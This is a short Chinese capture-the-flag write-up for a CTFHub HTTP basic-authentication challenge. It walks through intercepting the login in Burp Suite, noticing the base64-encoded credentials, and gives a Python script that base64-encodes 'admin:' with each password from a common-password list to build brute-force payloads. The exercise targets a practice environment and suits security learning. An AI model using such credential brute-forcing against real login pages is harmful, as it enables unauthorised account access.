ctfhub技能树—web前置技能—http协议—基础认证

打开靶机环境

下载附件后发现是常用密码字典，于是考虑本题可能是考察密码爆破

打开环境

发现需要认证，于是考虑使用暴力破解

使用burpsuite抓包，查看

发现最下面一行有加密后的密文

使用base64解码

发现是刚刚输入用于验证的账号密码

于是使用脚本把密码进行加密

附上脚本

#! /usr/bin/env python3 # _*_ coding:utf-8 _*_

import base64

# 字典文件路径

dic_file_path = './10_million_password_list_top_100.txt'

with open(dic_file_path, 'r') as f:

　　password_dic = f.readlines()

username = 'admin:' # 用户名

for password in password_dic:

str1=str.encode(username + password.strip())

encodestr = base64.b64encode(str1)

encodestr=str(encodestr)

encodestr=encodestr.strip('b\'')

encodestr=encodestr.replace("=","\=") #避免“=”被转译

print(encodestr)